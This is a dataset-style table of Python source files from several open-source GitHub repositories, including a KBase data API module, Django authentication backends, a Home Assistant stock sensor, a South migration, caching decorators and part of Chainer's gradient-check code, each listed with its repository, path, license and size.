| code (string, lengths 2–1.05M) | repo_name (string, lengths 5–104) | path (string, lengths 4–251) | language (stringclasses, 1 value) | license (stringclasses, 15 values) | size (int32, 2–1.05M) |
|---|---|---|---|---|---|
"""
Module for base class for Data API objects.
"""
# Imports
# Stdlib
from collections import namedtuple
import logging
import os
import re
try:
import cStringIO as StringIO
except ImportError:
import StringIO as StringIO
# Local
from doekbase.data_api.util import get_logger, log_start, log_end
from doekbase.workspace.client import Workspace
from doekbase.data_api.wsfile import WorkspaceFile
from doekbase.data_api import cache
from doekbase.data_api.util import PerfCollector, collect_performance
# Logging
_log = get_logger('doekbase.data_api.core')
# Globals
REF_PATTERN = re.compile("(.+/.+(/[0-9].+)?)|(ws\.[1-9][0-9]+\.[1-9][0-9]+)")
g_ws_url = "https://ci.kbase.us/services/ws/"
g_shock_url = "https://ci.kbase.us/services/shock-api/"
g_handle_url = "https://ci.kbase.us/services/handle_service/"
g_use_msgpack = True
g_stats = PerfCollector('ObjectAPI')
def fix_docs(cls):
for name, func in vars(cls).items():
if func is not None and func.__doc__ is None:
for parent in cls.__bases__:
if hasattr(parent, name):
parfunc = getattr(parent, name)
if parfunc and hasattr(parfunc, '__doc__'):
func.__doc__ = parfunc.__doc__
break
return cls
#: Name positional parts of WorkspaceInfo tuple
WorkspaceInfo = namedtuple('WorkspaceInfo', [
'id', # ws_id (int)
'workspace', # ws_name
'owner', # username
'moddate', # timestamp
'object', # int
'user_permission', # permission
'globalread', # permission
'lockstat', # lock_status
'metadata' # usermeta
])
def get_token():
    try:
        return os.environ["KB_AUTH_TOKEN"]
    except KeyError:
        raise Exception(
            "Missing authentication token! Set KB_AUTH_TOKEN environment variable.")
class ObjectAPI(object):
"""
Generic Object API for basic properties and actions
of a KBase Data Object.
In general, users will not instantiate this object directly, but instead
they will create a biology-specific object like `TaxonAPI` or
`GenomeAnnotationAPI`. However, methods in this class may be used to get
basic shared properties like provenance or metadata.
If you find yourself using some form of :meth:`get_data` or :meth:`get_data_subset` frequently,
you should consider wrapping those calls in a higher-level method that is
specific to the kind of data you want.
"""
def __init__(self, services=None, token=None, ref=None):
"""Create new object.
Args:
services (dict): Service configuration dictionary. Required keys:
* workspace_service_url: URL for Workspace, such as `https://ci.kbase.us/services/ws/`
ref (str): Object reference, which can be the name of the object
(although this is not unique), or a numeric identifier in the
format `A/B[/C]` where A is the number of the workspace, B is the
number identifying the object, and C is the "version" number of
the object.
"""
if services is None or type(services) != type({}):
raise TypeError("You must provide a service configuration dictionary! Found {0}".format(type(services)))
elif not services.has_key("workspace_service_url"):
raise KeyError("Expecting workspace_service_url key!")
if ref is None:
raise TypeError("Missing object reference!")
elif type(ref) != type("") and type(ref) != type(unicode()):
raise TypeError("Invalid reference given, expected string! "
"Found {0}".format(type(ref)))
elif re.match(REF_PATTERN, ref) is None:
raise TypeError("Invalid workspace reference string! Found {0}"
.format(ref))
self.services = services
self.ref = ref
self._token = None
ws_url = services["workspace_service_url"]
local_workspace = False
if '://' in ws_url: # assume a real Workspace server
if token is None or len(token.strip()) == 0:
self._token = get_token()
else:
self._token = token
_log.debug('Connect to Workspace service at {}'.format(ws_url))
self.ws_client = Workspace(ws_url, token=self._token)
else:
_log.debug('Load from Workspace file at {}'.format(ws_url))
local_workspace = True
self.ws_client = self._init_ws_from_files(ws_url)
info_values = self.ws_client.get_object_info_new({
"objects": [{"ref": self.ref}],
"includeMetadata": 0,
"ignoreErrors": 0})
if not info_values:
raise ValueError("Cannot find object: {}".format(self.ref))
oi = info_values[0]
self._info = {
"object_id": oi[0],
"object_name": oi[1],
"object_reference": "{0}/{1}".format(oi[6],oi[0]),
"object_reference_versioned": "{0}/{1}/{2}".format(oi[6],oi[0],oi[4]),
"type_string": oi[2],
"save_date": oi[3],
"version": oi[4],
"saved_by": oi[5],
"workspace_id": oi[6],
"workspace_name": oi[7],
"object_checksum": oi[8],
"object_size": oi[9],
"object_metadata": oi[10]
}
self._id = self._info["object_id"]
self._name = self._info["object_name"]
self._typestring = self.ws_client.translate_to_MD5_types(
[self._info["type_string"]]).values()[0]
self._version = str(self._info["version"])
self._schema = None
self._history = None
self._provenance = None
self._data = None
# Init stats
self._stats = g_stats
# Init the caching object. Pass in whether the object is
# publically available (which can determine whether it is cached)
if local_workspace:
global_read = True # Local file-workspace objects are public
else:
wsinfo = self.ws_client.get_workspace_info({
'id': self._info['workspace_id']})
wsinfo_obj = WorkspaceInfo(*wsinfo)
global_read = (wsinfo_obj.globalread == 'r')
self._cache = cache.ObjectCache(
self._info["object_reference_versioned"],
is_public=global_read)
# TODO always use a versioned reference to the data object
#self.ref = self._info["object_reference_versioned"]
@property
def stats(self):
return self._stats
@property
def cache_stats(self):
return self._cache.stats
def _init_ws_from_files(self, path):
ext = '.msgpack'
extlen = len(ext)
WorkspaceFile.use_msgpack = True
client = WorkspaceFile(path)
num_loaded = 0
for name in os.listdir(path):
if name.endswith(ext):
ref = name[:-extlen]
t0 = log_start(_log, 'load', level=logging.DEBUG,
kvp={'ref': ref})
client.load(ref)
log_end(_log, t0, 'client.load', level=logging.DEBUG,
kvp={'ref': ref})
num_loaded += 1
if num_loaded == 0:
raise ValueError('No files with extension "{e}" found in path {p}'
.format(e=ext, p=path))
return client
@collect_performance(g_stats)
def get_schema(self):
"""
Retrieve the schema associated with this object.
Returns:
string"""
if self._schema is None:
self._schema = self.ws_client.get_type_info(self.get_info()["type_string"])
return self._schema
@collect_performance(g_stats)
def get_typestring(self):
"""
Retrieve the type identifier string.
Returns:
string"""
return self._typestring
@collect_performance(g_stats)
def get_info(self):
"""Retrieve basic properties about this object.
Returns:
dict
object_id
object_name
object_reference
object_reference_versioned
type_string
save_date
version
saved_by
workspace_id
workspace_name
object_checksum
object_size
object_metadata"""
return self._info
@collect_performance(g_stats)
def get_history(self):
"""
Retrieve the recorded history of this object describing how it has been modified.
Returns:
list<dict>
object_id
object_name
object_reference
object_reference_versioned
type_string
save_date
version
saved_by
workspace_id
workspace_name
object_checksum
object_size
object_metadata
"""
        if self._history is None:
history_list = self.ws_client.get_object_history({"ref": self.ref})
self._history = list()
for object_info in history_list:
self._history.append({
"object_id": object_info[0],
"object_name": object_info[1],
"object_reference": "{0}/{1}".format(object_info[6],object_info[0]),
"object_reference_versioned": "{0}/{1}/{2}".format(object_info[6],
object_info[0],
object_info[4]),
"type_string": object_info[2],
"save_date": object_info[3],
"version": object_info[4],
"saved_by": object_info[5],
"workspace_id": object_info[6],
"workspace_name": object_info[7],
"object_checksum": object_info[8],
"object_size": object_info[9],
"object_metadata": object_info[10]})
return self._history
@collect_performance(g_stats)
def get_provenance(self):
"""
Retrieve the recorded provenance of this object describing how to recreate it.
Returns:
list<dict>
time
service_name
service_version
service_method
method_parameters
script_name
script_version
script_command_line
input_object_references
validated_object_references
intermediate_input_ids
intermediate_output_ids
external_data
description
"""
if self._provenance is None:
result = self.ws_client.get_object_provenance([{"ref": self.ref}])
if len(result) > 0:
provenance_list = result[0]["provenance"]
else:
provenance_list = list()
self._provenance = list()
copy_keys = {"time": "time",
"service": "service_name",
"service_ver": "service_version",
"method": "service_method",
"method_params": "method_parameters",
"script": "script_name",
"script_ver": "script_version",
"script_command_line": "script_command_line",
"input_ws_objects": "input_object_references",
"resolved_ws_objects": "validated_object_references",
"intermediate_incoming": "intermediate_input_ids",
"intermediate_outgoing": "intermediate_output_ids",
"external_data": "external_data",
"description": "description"}
for object_provenance in provenance_list:
action = dict()
for k in copy_keys:
if k in object_provenance:
if isinstance(object_provenance[k], list) and len(object_provenance[k]) == 0:
continue
action[copy_keys[k]] = object_provenance[k]
self._provenance.append(action)
return self._provenance
@collect_performance(g_stats)
def get_id(self):
"""
Retrieve the internal identifier for this object.
Returns:
string"""
return self._id
@collect_performance(g_stats)
def get_version(self):
"""
Retrieve the version identifier for this object.
Returns:
string"""
return self._version
@collect_performance(g_stats)
def get_name(self):
"""
Retrieve the name assigned to this object.
Returns:
string"""
return self._name
@collect_performance(g_stats)
def get_data(self):
"""Retrieve object data.
Returns:
dict (contents according to object type)"""
return self._cache.get_data(self._get_data_ws)
def _get_data_ws(self):
return self.ws_client.get_objects([{"ref": self.ref}])[0]["data"]
@collect_performance(g_stats)
def get_data_subset(self, path_list=None):
"""Retrieve a subset of data from this object, given a list of paths
to the data elements.
Args:
path_list (list): List of paths, each a string of node names
separated by forward slashes, e.g.
['a/bee/sea', 'd/ee/eph/gee']
Returns:
dict (contents according to object type and data requested)"""
return self._cache.get_data_subset(self._get_data_subset_ws,
path_list=path_list)
def _get_data_subset_ws(self, path_list=None):
return self.ws_client.get_object_subset([{"ref": self.ref,
"included": path_list}])[0]["data"]
@collect_performance(g_stats)
def get_referrers(self, most_recent=True):
"""Retrieve a dictionary that indicates by type what objects are
referring to this object.
Args:
most_recent: True or False, defaults to True indicating that results
should be restricted to the latest version of any referencing object.
If this parameter is False, results will contain all versions of any
referencing objects.
Returns:
dict typestring -> object_reference"""
referrers = self.ws_client.list_referencing_objects([{"ref": self.ref}])[0]
# sort all object references in descending order by time
        referrers = sorted(referrers, key=lambda obj: obj[3], reverse=True)
object_refs_by_type = {}
# keep track of which objects we have seen so far, the first instance will be the latest
# so only keep that reference
found_objects = {}
for x in referrers:
typestring = self.ws_client.translate_to_MD5_types([x[2]]).values()[0]
if typestring not in object_refs_by_type:
object_refs_by_type[typestring] = []
unversioned_ref = str(x[6]) + "/" + str(x[0])
if most_recent and unversioned_ref in found_objects:
continue
# Mark an entry for a new object
found_objects[unversioned_ref] = None
object_refs_by_type[typestring].append(str(x[6]) + "/" + str(x[0]) + "/" + str(x[4]))
return object_refs_by_type
@collect_performance(g_stats)
def copy(self, to_ws=None):
"""
Performs a naive object copy to a target workspace. A naive object copy is a simple
copy that only generates a copy object of this entity, but any referencing entities
are not included or considered. More specific object copies should be implemented by
specific types that understand their copy semantics for children and other referencing
or referenced objects.
Args:
to_ws : the target workspace to copy the object to, which the user must have permission
to write to."""
name = self.get_name()
try:
return self.ws_client.copy_object({"from": {"ref": self.ref}, "to": {"workspace": to_ws, "name": name}})
except Exception, e:
return {"error": e.message}
def __eq__(self, other):
"""Test equality by underlying KBase object ID.
"""
#print("@@ obj. eq called")
return self._id == other._id
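# --- Usage sketch (not part of the original module) --------------------------
# A minimal, hedged example of the pattern described in the ObjectAPI
# docstring: instantiate with a service dict and an object reference, then
# prefer get_data_subset() over get_data() when only part of the object is
# needed. The reference "1013/92/2" and the path "features/0/id" are
# illustrative placeholders, and KB_AUTH_TOKEN must be set in the environment
# when talking to a real Workspace server.
if __name__ == '__main__':
    services = {"workspace_service_url": g_ws_url}
    obj = ObjectAPI(services=services, token=None, ref="1013/92/2")
    print("name={0} type={1}".format(obj.get_name(), obj.get_typestring()))
    # Fetch only the needed slice of the object instead of the full data blob.
    subset = obj.get_data_subset(path_list=["features/0/id"])
    print(subset)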
|
kkellerlbl/data_api
|
lib/doekbase/data_api/core.py
|
Python
|
mit
| 16,991
|
import exploration_bidder
__all__ = ['exploration_bidder']
|
strands-project/strands_exploration
|
exploration_bid_manager/src/exploration_bid_manager/__init__.py
|
Python
|
mit
| 59
|
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from socialregistration.models import (FacebookProfile, TwitterProfile, OpenIDProfile)
class Auth(object):
def get_user(self, user_id):
try:
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None
class FacebookAuth(Auth):
def authenticate(self, uid=None):
try:
return FacebookProfile.objects.get(
uid=uid,
site=Site.objects.get_current()
).user
except FacebookProfile.DoesNotExist:
return None
class TwitterAuth(Auth):
def authenticate(self, twitter_id=None):
try:
return TwitterProfile.objects.get(
twitter_id=twitter_id,
site=Site.objects.get_current()
).user
except TwitterProfile.DoesNotExist:
return None
class OpenIDAuth(Auth):
def authenticate(self, identity=None):
try:
return OpenIDProfile.objects.get(
identity=identity,
site=Site.objects.get_current()
).user
except OpenIDProfile.DoesNotExist:
return None
|
coxmediagroup/django-socialregistration
|
socialregistration/auth.py
|
Python
|
mit
| 1,238
|
import datetime
from pyramid.view import view_config
from couchdbkit import *
import logging
log = logging.getLogger(__name__)
class Page(Document):
author = StringProperty()
page = StringProperty()
content = StringProperty()
date = DateTimeProperty()
@view_config(route_name='home', renderer='templates/mytemplate.pt')
def my_view(request):
def get_data():
return list(request.db.view('lists/pages', startkey=['home'], \
endkey=['home', {}], include_docs=True))
page_data = get_data()
if not page_data:
Page.set_db(request.db)
home = Page(
author='Wendall',
content='Using CouchDB via couchdbkit!',
page='home',
date=datetime.datetime.utcnow()
)
# save page data
home.save()
page_data = get_data()
doc = page_data[0].get('doc')
return {
'project': 'pyramid_couchdb_example',
'info': request.db.info(),
'author': doc.get('author'),
'content': doc.get('content'),
'date': doc.get('date')
}
|
benoitc/couchdbkit
|
examples/pyramidapp/pyramid_couchdb_example/views.py
|
Python
|
mit
| 1,100
|
"""
Stock market information that comes from Yahoo Finance.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.yahoo_finance/
"""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import ATTR_ATTRIBUTION
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['yahoo-finance==1.3.2']
_LOGGER = logging.getLogger(__name__)
ATTR_CHANGE = 'Change'
ATTR_OPEN = 'open'
ATTR_PREV_CLOSE = 'prev_close'
CONF_ATTRIBUTION = "Stock market information provided by Yahoo! Inc."
CONF_SYMBOLS = 'symbols'
DEFAULT_NAME = 'Yahoo Stock'
DEFAULT_SYMBOL = 'YHOO'
ICON = 'mdi:currency-usd'
MIN_TIME_BETWEEN_UPDATES = timedelta(minutes=5)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_SYMBOLS, default=[DEFAULT_SYMBOL]):
vol.All(cv.ensure_list, [cv.string]),
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Yahoo Finance sensor."""
from yahoo_finance import Share
symbols = config.get(CONF_SYMBOLS)
dev = []
for symbol in symbols:
if Share(symbol).get_price() is None:
_LOGGER.warning("Symbol %s unknown", symbol)
break
data = YahooFinanceData(symbol)
dev.append(YahooFinanceSensor(data, symbol))
add_devices(dev)
class YahooFinanceSensor(Entity):
"""Representation of a Yahoo Finance sensor."""
def __init__(self, data, symbol):
"""Initialize the sensor."""
self._name = symbol
self.data = data
self._symbol = symbol
self._state = None
self._unit_of_measurement = None
self.update()
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._symbol
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def device_state_attributes(self):
"""Return the state attributes."""
if self._state is not None:
return {
ATTR_ATTRIBUTION: CONF_ATTRIBUTION,
ATTR_CHANGE: self.data.price_change,
ATTR_OPEN: self.data.price_open,
ATTR_PREV_CLOSE: self.data.prev_close,
}
@property
def icon(self):
"""Return the icon to use in the frontend, if any."""
return ICON
def update(self):
"""Get the latest data and updates the states."""
_LOGGER.debug("Updating sensor %s - %s", self._name, self._state)
self.data.update()
self._state = self.data.state
class YahooFinanceData(object):
"""Get data from Yahoo Finance."""
def __init__(self, symbol):
"""Initialize the data object."""
from yahoo_finance import Share
self._symbol = symbol
self.state = None
self.price_change = None
self.price_open = None
self.prev_close = None
self.stock = Share(self._symbol)
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Get the latest data and updates the states."""
self.stock.refresh()
self.state = self.stock.get_price()
self.price_change = self.stock.get_change()
self.price_open = self.stock.get_open()
self.prev_close = self.stock.get_prev_close()
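# --- Usage sketch (not part of the original component) -----------------------
# In Home Assistant this platform is configured through configuration.yaml
# ("sensor: - platform: yahoo_finance" with an optional "symbols" list, per
# PLATFORM_SCHEMA above). The snippet below only exercises the data wrapper
# directly; it is illustrative and needs the yahoo-finance package installed.
if __name__ == '__main__':
    data = YahooFinanceData(DEFAULT_SYMBOL)
    data.update()
    print("{}: price={} change={}".format(
        DEFAULT_SYMBOL, data.state, data.price_change))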
|
srcLurker/home-assistant
|
homeassistant/components/sensor/yahoo_finance.py
|
Python
|
mit
| 3,667
|
"""
* Mini-Max Sum (Python)
* HackerRank Algorithm Challenge
* https://www.hackerrank.com/challenges/mini-max-sum
*
* michael@softwareontheshore.com
*
* The goal is to find the minimum sum and the maximum sum of 5 numbers by only using 4.
"""
##arr = map(int, raw_input().strip().split(' '))
testA = [1, 2, 3, 4, 5] ##10 14
testB = [2, 5, 1, 3, 4] ##10 14
testC = [6, 5, 9, 29, 2] ##22 49
def sumMiniMax(arr):
maximum = sum(sorted(arr)[1:5])
minimum = sum(sorted(arr)[0:4])
return str(minimum) + ' ' + str(maximum)
print sumMiniMax(testC)
|
masharp/algorithm-challenges-n-stuff
|
coding-challenges/hacker-rank/algorithms/MiniMaxSum.py
|
Python
|
mit
| 566
|
import numpy as np
import pytest
from landlab import FieldError, RasterModelGrid
from landlab.utils.return_array import return_array_at_link, return_array_at_node
def test_no_field():
mg = RasterModelGrid((10, 10))
with pytest.raises(FieldError):
return_array_at_node(mg, "spam")
with pytest.raises(FieldError):
return_array_at_link(mg, "spam")
def test_return_array():
mg = RasterModelGrid((10, 10))
node_vals = np.arange(mg.number_of_nodes)
out = return_array_at_node(mg, node_vals)
np.testing.assert_array_equal(np.arange(mg.number_of_nodes), out)
link_vals = np.arange(mg.number_of_links)
out = return_array_at_link(mg, link_vals)
np.testing.assert_array_equal(np.arange(mg.number_of_links), out)
|
cmshobe/landlab
|
tests/utils/test_return_grid.py
|
Python
|
mit
| 765
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Emblem'
db.create_table(u'chat_emblem', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('url', self.gf('django.db.models.fields.CharField')(max_length=150)),
('name', self.gf('django.db.models.fields.CharField')(max_length=40)),
))
db.send_create_signal(u'chat', ['Emblem'])
# Adding model 'Roll'
db.create_table(u'chat_roll', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=20)),
))
db.send_create_signal(u'chat', ['Roll'])
# Adding model 'UserProfile'
db.create_table(u'chat_userprofile', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], unique=True)),
('ign', self.gf('django.db.models.fields.CharField')(unique=True, max_length=75)),
('verified', self.gf('django.db.models.fields.BooleanField')(default=False)),
('isMod', self.gf('django.db.models.fields.BooleanField')(default=False)),
('banned', self.gf('django.db.models.fields.BooleanField')(default=False)),
('primRole', self.gf('django.db.models.fields.related.ForeignKey')(related_name='primary', to=orm['chat.Roll'])),
('secRole', self.gf('django.db.models.fields.related.ForeignKey')(related_name='secondary', to=orm['chat.Roll'])),
('tier', self.gf('django.db.models.fields.CharField')(max_length=20, blank=True)),
('division', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
))
db.send_create_signal(u'chat', ['UserProfile'])
# Adding model 'Comments'
db.create_table(u'chat_comments', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('profile', self.gf('django.db.models.fields.related.ForeignKey')(default=False, to=orm['chat.UserProfile'])),
('text', self.gf('django.db.models.fields.CharField')(max_length=255)),
('datetime', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
))
db.send_create_signal(u'chat', ['Comments'])
def backwards(self, orm):
# Deleting model 'Emblem'
db.delete_table(u'chat_emblem')
# Deleting model 'Roll'
db.delete_table(u'chat_roll')
# Deleting model 'UserProfile'
db.delete_table(u'chat_userprofile')
# Deleting model 'Comments'
db.delete_table(u'chat_comments')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'chat.comments': {
'Meta': {'ordering': "['datetime']", 'object_name': 'Comments'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'profile': ('django.db.models.fields.related.ForeignKey', [], {'default': 'False', 'to': u"orm['chat.UserProfile']"}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'chat.emblem': {
'Meta': {'object_name': 'Emblem'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '150'})
},
u'chat.roll': {
'Meta': {'object_name': 'Roll'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
u'chat.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'banned': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'division': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ign': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75'}),
'isMod': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'primRole': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary'", 'to': u"orm['chat.Roll']"}),
'secRole': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'secondary'", 'to': u"orm['chat.Roll']"}),
'tier': ('django.db.models.fields.CharField', [], {'max_length': '20', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'unique': 'True'}),
'verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['chat']
|
crazyskateface/LC
|
chat/migrations/0014_initial.py
|
Python
|
mit
| 8,645
|
#-*- coding: utf-8 -*-
import functools
from django.contrib import messages
from django.utils.translation import ugettext as _
from .ratelimit import RateLimit
__all__ = ['ratelimit', ]
def ratelimit(method=None, field=None, rate='5/5m'):
def decorator(func):
@functools.wraps(func)
def wrapper(request, *args, **kwargs):
rl = RateLimit(request, func.__name__, method=method, field=field, rate=rate)
request.is_limited = rl.is_limited()
if request.is_limited:
messages.error(request, _('Too many submissions, wait %(time)s.') % {'time': rate.split('/')[1], })
return func(request, *args, **kwargs)
return wrapper
return decorator
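# --- Usage sketch (not part of the original module) --------------------------
# A hedged example of applying the decorator to a Django view. The rate string
# uses the same "count/period" form as the default above ('5/5m'); the view and
# template names are illustrative placeholders and assume a configured Django
# project with the messages framework enabled.
from django.shortcuts import render


@ratelimit(method='POST', field='username', rate='5/5m')
def example_login_view(request):
    if request.is_limited:
        # A "too many submissions" message was already queued by the decorator
        # via django.contrib.messages.
        return render(request, 'example_login.html')
    return render(request, 'example_login.html')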
|
bjorncooley/rainforest_makers
|
spirit/utils/ratelimit/decorators.py
|
Python
|
mit
| 737
|
#!/usr/bin/env python3
""" Script for getting status information about this cluster of central servers.
By default the request is made to the local server and reflects the view of the
cluster as seen by the local node.
"""
import requests
import json
import sys
HOST = "localhost"
PORT = 8083 # The internal listening port of the Jetty web server.
TARGET_URL = "http://%s:%s/public_system_status/check_ha_cluster_status" % (
HOST, PORT)
r = requests.get(TARGET_URL)
if r.status_code != requests.codes.OK:
print("Failed to check the status of the HA cluster: %s (%s)" % (
r.status_code, r.text))
sys.exit(1)
try:
result = json.loads(r.text).get('ha_node_status', dict())
if not result.get('ha_configured'):
print("This central server is not part of an HA cluster")
sys.exit(0)
print("\nSUMMARY OF CLUSTER STATUS:")
print(" All nodes: %s" % ("OK" if result.get("all_nodes_ok") else "NOK"))
print(" Configuration: %s" % (
"OK" if result.get("configuration_ok") else "NOK"))
print("\nDETAILED CLUSTER STATUS INFORMATION:")
print(json.dumps(result, sort_keys=True, indent=4, separators=(',', ': ')))
except Exception as e:
print("Failed to parse the status of the HA cluster: %s" % (e))
sys.exit(1)
|
ria-ee/X-Road
|
src/packages/xroad/cluster/check_ha_cluster_status.py
|
Python
|
mit
| 1,290
|
import itertools
def cached(func):
def wrapper(*args, **kwargs):
host = args[0]
if not hasattr(host, 'cache'):
setattr(host, 'cache', {})
if func not in host.cache:
host.cache[func] = func(*args, **kwargs)
return host.cache[func]
return wrapper
def cached_with_args(func):
def wrapper(*args, **kwargs):
host = args[0]
if not hasattr(host, 'cache'):
setattr(host, 'cache', {})
if func not in host.cache:
host.cache[func] = {}
cached_args = tuple(itertools.chain(args, kwargs.values()))
if cached_args not in host.cache[func]:
host.cache[func][cached_args] = func(*args, **kwargs)
        return host.cache[func][cached_args]
return wrapper
def invalidate_cache(func):
def wrapper(*args, **kwargs):
host = args[0]
if hasattr(host, 'cache'):
host.cache = {}
return func(*args, **kwargs)
return wrapper
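# --- Usage sketch (not part of the original module) --------------------------
# A minimal example of the intended call pattern: each decorator expects the
# first positional argument to be the object that carries the cache, so they
# are meant for methods. The class below is illustrative only.
class _ExampleHost(object):
    @cached
    def expensive(self):
        print('computing...')
        return 42

    @cached_with_args
    def lookup(self, key):
        print('looking up {}...'.format(key))
        return key * 2

    @invalidate_cache
    def reset(self):
        pass


if __name__ == '__main__':
    host = _ExampleHost()
    host.expensive()   # computes and stores the result in host.cache
    host.expensive()   # served from host.cache
    host.lookup(3)     # computes
    host.lookup(3)     # served from the per-argument cache
    host.reset()       # clears host.cache before running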
|
jpalladino84/Python-Roguelike-Framework
|
util/decorators.py
|
Python
|
mit
| 992
|
import math
import warnings
import numpy
import six
from chainer.backends import cuda
from chainer import configuration
from chainer import FunctionNode
from chainer import testing
from chainer import variable
class NondifferentiableError(Exception):
pass
def _copy_arrays(xs):
xp = cuda.get_array_module(*xs)
return [xp.array(x, order='C', dtype=numpy.float64, copy=True) for x in xs]
def numerical_grad(
f, inputs, grad_outputs, eps=1e-3,
detect_nondifferentiable=False, diff_atol=0, diff_rtol=1e-2,
center_outputs=None):
"""Computes numerical gradient by finite differences.
This function is used to implement gradient check. For usage example, see
unit tests of :mod:`chainer.functions`.
By default, ``numerical_grad`` computes the gradient to the first order of
``eps``.
Args:
f (callable): Python function with no arguments that runs forward
computation and returns the result.
inputs (tuple of arrays): Tuple of arrays that should be treated as
inputs. Each element of them is slightly modified to realize
numerical gradient by finite differences.
grad_outputs (tuple of arrays): Tuple of arrays that are treated as
output gradients.
eps (float): Epsilon value of finite differences.
detect_nondifferentiable (bool):
``False`` by default.
If ``True``, ``numerical_grad`` checks whether ``f`` is
differentiable at ``inputs``.
It requires evaluation of ``f`` at 5 points instead of 2.
As a side effect, the accuracy of numerical gradient will be
increased to the third order of ``eps``.
If it turns out that ``f`` is non-differentiable at ``input``,
``numerical_grad`` raises
:class:`~chainer.gradient_check.NondifferentiableError`.
diff_atol (float):
Absolute tolerance of fitting error of non-differentiable point
detection.
diff_rtol (float):
Tolerance of fitting error of non-differentiable point detection
relative to the output values of ``f``.
center_outputs (tuple of arrays or None):
Only used if ``detect_nondifferentiable`` is ``True``.
If specified, these arrays are used as the outputs of ``f`` at
``inputs``.
